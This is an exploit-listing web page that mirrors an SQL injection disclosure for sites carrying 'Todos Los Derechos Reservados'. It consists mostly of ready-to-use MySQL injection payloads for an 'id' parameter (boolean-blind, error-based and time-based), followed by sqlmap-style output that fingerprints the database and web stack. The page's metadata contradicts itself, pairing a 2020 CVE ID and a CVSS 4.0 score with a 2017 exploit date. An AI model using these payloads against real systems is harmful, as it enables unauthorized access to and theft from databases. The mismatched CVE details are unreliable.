Advertisement






Todos Los Derechos Reservados SQL Injection

CVE Category Price Severity
CVE-2020-11498 CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2017-07-22
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.7321 0.822

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017070143

Below is a copy:

Todos Los Derechos Reservados SQL Injection--- Data: 22/07/2017
--- Creditos: Informacion - Anonymous
--- Testeado: W10
--- PoFF: 
- ========= Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=200 RLIKE (SELECT (CASE WHEN (7654=7654) THEN 200 ELSE 0x28 END))

    ====== Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=200 AND (SELECT 4762 FROM(SELECT COUNT(*),CONCAT(0x717a767871,(SELECT (ELT(4762=4762,1))),0x71626a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    ========== Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=200 AND SLEEP(5)
---
======= [03:47:22] [INFO] the back-end DBMS is MySQL
web application technology: PHP 4.4.9, Apache
========= back-end DBMS: MySQL >= 5.0



Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum